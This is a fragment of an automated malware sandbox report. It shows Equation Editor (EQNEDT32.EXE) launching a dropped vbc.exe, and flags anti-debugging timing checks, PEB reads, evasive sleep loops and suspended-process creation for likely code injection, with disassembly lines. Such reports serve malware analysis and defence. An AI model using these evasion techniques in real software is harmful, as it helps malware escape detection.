lfence 0x00000092 jmp 00007FF3F0AF739Ah 0x00000094 test ax, cx 0x00000097 cmp ecx, edx 0x00000099 test ebx, eax 0x0000009b cmp edx, 8B44DCE9h 0x000000a1 ret 0x000000a2 mov esi, edx 0x000000a4 pushad 0x000000a5 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852 Thread sleep time: -240000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369889 rdtsc 6_2_00369889

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369889 rdtsc 6_2_00369889
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003664E7 mov eax, dword ptr fs:[00000030h] 6_2_003664E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003636BB mov eax, dword ptr fs:[00000030h] 6_2_003636BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036929E mov eax, dword ptr fs:[00000030h] 6_2_0036929E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364336 mov eax, dword ptr fs:[00000030h] 6_2_00364336
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A32B mov eax, dword ptr fs:[00000030h] 6_2_0036A32B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00368B74 mov eax, dword ptr fs:[00000030h] 6_2_00368B74
Source: C:\Users\Public\vbc.exe Code function: 6_2_003643BB mov eax, dword ptr fs:[00000030h] 6_2_003643BB

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.685686723.0000000000AC0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs